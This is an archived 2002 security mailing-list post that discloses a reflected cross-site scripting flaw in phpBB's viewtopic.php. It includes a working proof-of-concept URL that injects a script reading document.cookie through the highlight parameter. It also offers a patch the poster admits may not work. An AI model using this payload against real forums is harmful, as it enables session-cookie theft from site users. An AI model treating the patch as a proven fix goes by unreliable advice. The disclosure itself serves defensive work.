XSS bug in phpBB

From: Arab VieruZ (arabviersusat_private)
Date: Mon Nov 18 2002 - 04:33:41 PST

Next message: David Endler: "[Full-Disclosure] Update: iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability"

Previous message: Richard Moore: "Re: When scrubbing secrets in memory doesn't work"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Vulnerable systems: The Last ver Exploit: http://phpbb.com/phpBB/viewtopic.php? t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> (without "*") Solution: i think that will work , but im not sure open viewtopic.php and put this code $highlight = htmlspecialchars($highlight); $highlight = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $highlight);

Next message: David Endler: "[Full-Disclosure] Update: iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability"
Previous message: Richard Moore: "Re: When scrubbing secrets in memory doesn't work"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 20 2002 - 04:10:21 PST